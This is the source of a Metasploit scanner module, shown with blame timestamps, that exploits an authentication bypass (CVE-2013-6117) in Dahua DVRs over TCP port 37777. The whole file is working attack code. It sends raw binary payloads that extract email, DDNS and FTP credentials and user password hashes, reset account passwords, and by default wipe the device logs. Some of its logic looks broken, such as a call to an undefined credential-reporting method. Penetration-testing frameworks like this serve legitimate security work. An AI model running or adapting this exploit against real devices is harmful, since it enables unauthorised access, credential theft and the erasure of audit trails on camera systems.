metasploit-framework/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

382 lines
13 KiB
Ruby
Raw Normal View History

class Metasploit3 < Msf::Auxiliary
2015-11-17 15:48:57 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
2015-11-17 19:30:33 +00:00
def initialize
super(
'Name' => %q(Dahua DVR Auth Bypass Scanner),
'Description' => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs),
2015-11-17 19:30:33 +00:00
'Author' => [
'Jake Reynolds - Depth Security', # Vulnerability Discoverer
'Tyler Bennett - Talos Infosec' # Metasploit Module
],
'References' => [
[ 'CVE', '2013-6117' ],
[ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ]
],
2015-12-03 23:15:48 +00:00
'License' => MSF_LICENSE,
'DefaultAction' => 'VERSION',
'Actions' =>
[
[ 'CHANNEL', { 'Description' => 'Obtain the channel/camera information from the DVR' } ],
[ 'DDNS', { 'Description' => 'Obtain the DDNS settings from the DVR' } ],
[ 'EMAIL', { 'Description' => 'Obtain the email settings from the DVR' } ],
[ 'GROUP', { 'Description' => 'Obtain the group information the DVR' } ],
[ 'NAS', { 'Description' => 'Obtain the NAS settings from the DVR' } ],
[ 'RESET', { 'Description' => 'Reset an existing user\'s password on the DVR' } ],
[ 'SERIAL', { 'Description' => 'Obtain the serial number from the DVR' } ],
[ 'USER', { 'Description' => 'Obtain the user information from the DVR' } ],
[ 'VERSION', { 'Description' => 'Obtain the version of the DVR' } ]
]
)
2015-11-17 19:30:33 +00:00
deregister_options('RHOST')
register_options([
OptString.new('USERNAME', [false, 'A username to reset', '888888']),
OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']),
OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), true]),
2015-11-17 19:30:33 +00:00
Opt::RPORT(37777)
])
end
U1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
DVR_RESP = "\xb1\x00\x00\x58\x00\x00\x00\x00"
# Payload to grab version of the DVR
VERSION = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to grab Email Settings of the DVR
EMAIL = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \
"\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to grab DDNS Settings of the DVR
DDNS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \
"\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to grab NAS Settings of the DVR
NAS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \
"\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to grab the Channels that each camera is assigned to on the DVR
CHANNELS = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to grab the Users Groups of the DVR
GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to grab the Users and their hashes from the DVR
USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to grab the Serial Number of the DVR
SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Payload to clear the logs of the DVR
CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
def setup
@password = datastore['PASSWORD']
@password ||= Rex::Text.rand_text_alpha(6)
2015-11-17 19:30:33 +00:00
end
def grab_version
2015-11-17 19:30:33 +00:00
connect
sock.put(VERSION)
data = sock.get_once
return unless data =~ /[\x00]{8,}([[:print:]]+)/
ver = Regexp.last_match[1]
print_good("#{peer} -- version: #{ver}")
end
2015-12-03 23:15:48 +00:00
def grab_serial
2015-12-03 23:22:27 +00:00
connect
sock.put(SN)
data = sock.get_once
return unless data =~ /[\x00]{8,}([[:print:]]+)/
serial = Regexp.last_match[1]
print_good("#{peer} -- serial number: #{serial}")
end
def grab_email
connect
sock.put(EMAIL)
2015-12-03 23:39:27 +00:00
return unless (response = sock.get_once)
data = response.split('&&')
return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i
email_table = Rex::Ui::Text::Table.new(
'Header' => 'Dahua Email Settings',
'Indent' => '1',
'Columns' => ['Email Server', 'Email Port', 'Email User', 'Email Password']
)
2015-12-03 23:39:27 +00:00
if mailhost = Regexp.last_match[1].split(':')
mailserver = "#{mailhost[0]}"
mailport = "#{mailhost[1]}"
2015-12-03 23:39:27 +00:00
end
return unless data[5].blank? && data[6].blank?
muser = "#{data[5]}"
mpass = "#{data[6]}"
email_table << ["#{mailserver}", "#{mailport}", "#{muser}", "#{mpass}"]
return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank?
email_table.print
report_email_creds(mailserver, mailport, muser, mpass)
end
def grab_ddns
connect
sock.put(DDNS)
2015-12-03 23:39:27 +00:00
return unless (response = sock.get_once)
data = response.split(/&&[0-1]&&/)
ddns_table = Rex::Ui::Text::Table.new(
'Header' => 'Dahua DDNS Settings',
'Indent' => 1,
'Columns' => ['DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password']
)
2015-12-03 23:39:27 +00:00
data.each_with_index do |val, index|
next if index == 0
val = val.split("&&")
ddns_service = "#{val[0]}"
ddns_server = "#{val[1]}"
ddns_port = "#{val[2]}"
ddns_domain = "#{val[3]}"
ddns_user = "#{val[4]}"
ddns_pass = "#{val[5]}"
ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}", "#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"]
unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank?
ddns_table.print
report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)
2015-11-17 19:30:33 +00:00
end
end
end
def grab_nas
connect
sock.put(NAS)
2015-12-03 23:39:27 +00:00
return unless (data = sock.get_once)
print_status("Nas Settings @ #{rhost}:#{rport}!:")
server = ''
port = ''
nas_table = Rex::Ui::Text::Table.new(
'Header' => 'Dahaua NAS Settings',
'Indent' => '1',
'Columns' => ['Nas Server', 'Nas Port', 'FTP User', 'FTP Pass']
)
2015-12-03 23:39:27 +00:00
if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/
server = Regexp.last_match[1].unpack('C*').join('.')
port = Regexp.last_match[2].unpack('S')
end
if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data
ftpuser.strip!
ftppass.strip!
unless ftpuser.blank? || ftppass.blank?
nas_table << ["#{server}", "#{port}", "#{ftpuser}", "#{ftppass}"]
nas_table.print
2015-12-03 23:39:27 +00:00
report_creds(
host: server,
port: port,
user: ftpuser,
pass: ftppass,
type: "FTP",
active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil?
2015-11-17 19:30:33 +00:00
end
end
end
def grab_channels
connect
sock.put(CHANNELS)
data = sock.get_once.split('&&')
disconnect
return unless data.length > 1
print_good("#{peer} -- camera channels:")
data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") }
end
def grab_users
connect
sock.put(USERS)
2015-12-03 23:39:27 +00:00
return unless (response = sock.get_once)
data = response.split('&&')
usercount = 0
users_table = Rex::Ui::Text::Table.new(
'Header' => 'Dahua Users Hashes and groups',
'Indent' => '1',
'Columns' => ['Username', 'Password Hash', 'Permissions', 'Description']
)
2015-12-03 23:39:27 +00:00
print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!")
data.each do |val|
usercount += 1
pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}"
# print_status("Perms: #{val[/(([0-9][0-9]*, )*[0-9][0-9]*)/]}")
2015-12-03 23:39:27 +00:00
value = pass.split(":")
user = "#{value[1]}"
md5hash = "#{value[2]}"
print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}")
# Write the dahua hash to the database
hash = "#{rhost} #{user}:$dahua$#{md5hash}"
report_hash(rhost, rport, user, hash)
# Write the vulnerability to the database
report_vuln(
host: rhost,
port: rport,
proto: 'tcp',
sname: 'dvr',
name: 'Dahua Authentication Password Hash Exposure',
info: "Obtained password hash for user #{user}: #{md5hash}",
refs: references
)
end
end
def grab_groups
connect
sock.put(GROUPS)
2015-12-03 23:39:27 +00:00
return unless (response = sock.get_once)
data = response.split('&&')
print_good("#{peer} -- groups:")
data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") }
end
def reset_user
2015-12-03 23:22:27 +00:00
connect
userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password
u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring
sock.put(u1)
sock.put(u2)
sock.put(u3)
2015-12-03 23:16:54 +00:00
sock.get_once
sock.put(u1)
return unless sock.get_once
print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}")
end
def clear_logs
2015-12-03 23:22:27 +00:00
connect
sock.put(CLEAR_LOGS1)
sock.put(CLEAR_LOGS2)
2015-12-03 23:01:27 +00:00
print_good("#{peer} -- logs cleared")
end
def peer
"#{rhost}:#{rport}"
end
def run_host(_ip)
2015-12-03 23:15:48 +00:00
begin
connect
sock.put(U1)
data = sock.recv(8)
disconnect
return unless data == DVR_RESP
2015-12-03 23:01:27 +00:00
print_good("#{peer} -- Dahua-based DVR found")
report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR")
2015-12-03 23:01:27 +00:00
2015-12-03 23:15:48 +00:00
case action.name.upcase
when 'CHANNEL'
grab_channels
2015-12-03 23:15:48 +00:00
when 'DDNS'
grab_ddns
when 'EMAIL'
grab_email
when 'GROUP'
grab_groups
2015-12-03 23:15:48 +00:00
when 'NAS'
grab_nas
when 'RESET'
reset_user
2015-12-03 23:15:48 +00:00
when 'SERIAL'
grab_serial
when 'USER'
grab_users
when 'VERSION'
grab_version
2015-11-17 19:30:33 +00:00
end
2015-12-03 23:15:48 +00:00
clear_logs if datastore['CLEAR_LOGS']
ensure
2015-11-17 19:30:33 +00:00
disconnect
end
end
def report_hash(rhost, rport, user, hash)
2015-11-17 19:30:33 +00:00
service_data = {
address: rhost,
2015-11-17 19:30:33 +00:00
port: rport,
service_name: 'dahua_dvr',
protocol: 'tcp',
workspace_id: myworkspace_id
}
2015-11-17 19:30:33 +00:00
credential_data = {
module_fullname: fullname,
2015-11-17 19:30:33 +00:00
origin_type: :service,
private_data: hash,
private_type: :nonreplayable_hash,
jtr_format: 'dahua_hash',
username: user
}.merge(service_data)
2015-11-17 19:30:33 +00:00
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_data)
2015-11-17 19:30:33 +00:00
create_credential_login(login_data)
end
def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)
2015-11-17 19:30:33 +00:00
service_data = {
address: ddns_server,
2015-11-17 19:30:33 +00:00
port: ddns_port,
service_name: 'ddns settings',
protocol: 'tcp',
workspace_id: myworkspace_id
}
2015-11-17 19:30:33 +00:00
credential_data = {
module_fullname: fullname,
2015-11-17 19:30:33 +00:00
origin_type: :service,
private_data: ddns_pass,
private_type: :password,
username: ddns_user
}.merge(service_data)
2015-11-17 19:30:33 +00:00
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_data)
2015-11-17 19:30:33 +00:00
create_credential_login(login_data)
end
def report_email_cred(mailserver, mailport, muser, mpass)
2015-11-17 19:30:33 +00:00
service_data = {
address: mailserver,
port: mailport,
2015-11-17 19:30:33 +00:00
service_name: 'email settings',
protocol: 'tcp',
workspace_id: myworkspace_id
}
2015-11-17 19:30:33 +00:00
credential_data = {
module_fullname: fullname,
2015-11-17 19:30:33 +00:00
origin_type: :service,
private_data: mpass,
private_type: :password,
username: muser
}.merge(service_data)
2015-11-17 19:30:33 +00:00
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_data)
2015-11-17 19:30:33 +00:00
create_credential_login(login_data)
end
end